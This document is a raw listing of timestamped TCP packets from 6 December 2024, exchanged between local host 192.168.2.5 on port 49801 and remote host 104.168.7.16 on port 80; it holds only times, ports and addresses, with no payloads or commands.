                                                                              Dec 6, 2024 09:59:37.952792883 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.952873945 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.955212116 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.955271959 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.955321074 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.955360889 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.957701921 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.957758904 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.957825899 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.957865953 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.960181952 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.960237026 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.960248947 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.960479021 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.962683916 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.962737083 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.962781906 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.962824106 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.965358973 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.965420008 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.965487003 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.965524912 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:37.967586994 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:37.967644930 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.029742002 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.029869080 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.029941082 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.030731916 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.030860901 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.030915022 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.032830954 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.032845974 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.032892942 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.034641027 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.034686089 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.034738064 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.034775972 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.036607981 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.036660910 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.036730051 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.036781073 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.038484097 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.038539886 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.038582087 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.038678885 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.040355921 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.040426016 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.040467978 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.040515900 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.042246103 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.042365074 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.042447090 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.044059992 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.044110060 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.044192076 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.044248104 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.045878887 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.045938969 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.046099901 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.046149969 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.047679901 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.047729015 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.047799110 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.047848940 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.049422979 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.049489021 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.049493074 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.049530029 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.051456928 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.051592112 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.051635981 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.052938938 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.052990913 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.053060055 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.053148031 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.054677010 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.054734945 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.054774046 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.054816008 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.056365013 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.056451082 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.056510925 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.058156013 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.058290958 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.058341980 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.059799910 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.059856892 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.059875965 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.059921980 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.061476946 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.061507940 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.061609983 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.063204050 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.063254118 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.063273907 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.063337088 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.064690113 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.064804077 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.064840078 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.064840078 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.066306114 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.066380978 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.066433907 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.067920923 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.067994118 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.068042040 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.068227053 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.069622040 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.069679022 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.069742918 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.069878101 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.071091890 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.071145058 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.071269989 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.071316957 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.072662115 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.072736025 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.072846889 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.072886944 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.074261904 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.074311972 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.074326992 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.074418068 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.075805902 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.075905085 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.075917959 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.075958967 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.077389956 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.077446938 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.077481985 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.077537060 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.078891993 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.078953028 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.078994989 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.079041004 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.080848932 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.080899000 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.080924034 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.080960035 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.081937075 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.082003117 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.082034111 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.082082987 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.083527088 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.083606005 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.083621979 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.083664894 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.084938049 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.085002899 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.085009098 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.085047960 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.086427927 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.086481094 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.086520910 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.086565018 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.087357044 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.087429047 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.087472916 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.087519884 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.088202953 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.088267088 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.088269949 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.088313103 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.089132071 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.089189053 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.089243889 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.089287996 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.090089083 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.090142012 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.090190887 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.090349913 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.090964079 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.091011047 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.091046095 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.091133118 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.091825962 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.091875076 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.091975927 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.092094898 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.092890978 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.093000889 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.093029976 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.093074083 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.093580008 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.093692064 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.093694925 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.093744040 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.094506979 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.094578981 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.094649076 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.094710112 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.095403910 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.095474005 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.095544100 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.095597029 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.096276999 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.096378088 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.096379042 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.096448898 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.097160101 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.097245932 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.097361088 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.097409010 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.098071098 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.098119974 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.098167896 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.098222971 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.098953009 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.099009037 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.099191904 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.099242926 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.099858046 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.099925041 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.099970102 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.100027084 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.100758076 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.100886106 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.100904942 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.100934982 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.101996899 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.102061033 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.102118015 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.102194071 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.102557898 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.102657080 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.102782965 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.102838993 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.103408098 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.103467941 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.219629049 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.219666958 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.219692945 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.219727993 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.219926119 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.219974995 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.220006943 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.220046043 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.220849991 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.220894098 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.220899105 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.220931053 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.221750975 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.221780062 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.221795082 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.221818924 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.222659111 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.222702026 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.222754955 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.222796917 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.223515034 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.223561049 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.223675966 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.223721027 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.224428892 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.224478006 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.224539042 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.224579096 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.225624084 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.225718975 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.225723028 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.225764036 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.226448059 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.226494074 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.226531982 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.226694107 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.227097034 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.227149010 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.227195978 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.227241993 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.227986097 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.228033066 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.228066921 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.228108883 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.229073048 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.229135990 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.229151011 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.229175091 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.229847908 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.229899883 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.229940891 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.229976892 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.230645895 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.230815887 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.230818033 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.230865002 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.231982946 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.232079983 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.232136011 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.232752085 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.232805967 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.232856989 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.232925892 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.233352900 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.233397007 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.233424902 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.233470917 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.234181881 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.234235048 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.234901905 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.234958887 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.235070944 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.235121012 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.235800028 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.235858917 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.236069918 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.236124992 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.236373901 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.236432076 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.237047911 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.237116098 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.237149000 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.237215042 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.237781048 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.237837076 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.237840891 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.237890005 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.238637924 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.238694906 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.238707066 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.238754034 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.239538908 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.239587069 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.239609957 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.239658117 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.240482092 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.240535975 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.240585089 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.240645885 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.241374016 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.241425037 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.241488934 CET8049801104.168.7.16192.168.2.5
                                                                              Dec 6, 2024 09:59:38.241558075 CET4980180192.168.2.5104.168.7.16
                                                                              Dec 6, 2024 09:59:38.242238998 CET8049801104.168.7.16192.168.2.5
